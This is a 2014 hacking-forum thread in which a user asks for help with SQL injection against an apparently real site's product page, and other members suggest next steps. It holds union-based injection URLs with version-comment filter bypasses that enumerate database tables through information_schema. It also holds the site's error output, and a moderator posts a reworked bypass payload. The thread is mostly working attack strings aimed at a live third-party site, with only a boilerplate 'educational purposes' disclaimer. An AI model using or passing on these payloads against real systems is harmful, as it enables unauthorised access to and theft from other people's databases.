Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Need help for SQL Injection

  • 0 Vote(s) - 0 Average


09-18-2014, 02:31 AM #1
jibon57 Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:19 Threads:4 Joined:Aug 2014 Reputation: 0
Mood: None
Hello,

I was trying to get table list using SQL injection like this:

Code:
product.php?id=100'
Output
Code:
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/ionc/public_html/product.php on line 5
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ) ORDER BY serial ASC' at line 7
after
Code:
product.php?id=-100+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,concat/*!50000(0x3c62723e,table_name)*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+
output
Code:
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/ionc/public_html/product.php on line 5
Operand should contain 1 column(s)
What I will do next ? Any suggestion please. Thanks in advance Smiley1

09-18-2014, 03:14 AM #2
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:790 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
pleas post the link here Smiley1 we can't help you with no nearly information's

ps try it over error based

[Image: xodhvlpa.jpg]
[Image: test.php]

09-24-2014, 05:41 AM #3
SysToxic Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:11 Threads:1 Joined:Jul 2013 Reputation: 0
Mood: Hacker
Try to id=-100' would perhaps.

09-25-2014, 01:39 AM #4
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:790 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
SysToxic Smiley1 nice try but he was do it allready and it drops a error Smiley1
but you can try this bypass :
Code:
-100)+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,concat/*!50000(0x3c62723e,table_name)*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+

[Image: xodhvlpa.jpg]
[Image: test.php]

09-25-2014, 04:07 AM #5
SysToxic Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:11 Threads:1 Joined:Jul 2013 Reputation: 0
Mood: Hacker
T3N38R15,

Bro I know but URL does not have. I do not speak the exact. Smiley1

09-25-2014, 04:10 AM #6
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:790 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
? sorry bro i don't understand you Smiley1
what did you mean with "I do not speak the exact"

[Image: xodhvlpa.jpg]
[Image: test.php]

09-25-2014, 04:16 AM #7
SysToxic Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:11 Threads:1 Joined:Jul 2013 Reputation: 0
Mood: Hacker
Sorry, I have bad English.

Never mind. Smiley1

09-25-2014, 04:18 AM #8
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:790 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
no problem Smiley1
but pleas try you best to speak English here that all can understand you Smiley1

[Image: xodhvlpa.jpg]
[Image: test.php]

09-25-2014, 04:22 AM #9
SysToxic Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:11 Threads:1 Joined:Jul 2013 Reputation: 0
Mood: Hacker
I understand. Smiley1






Forum Jump:


Users browsing this thread:1 Guest(s)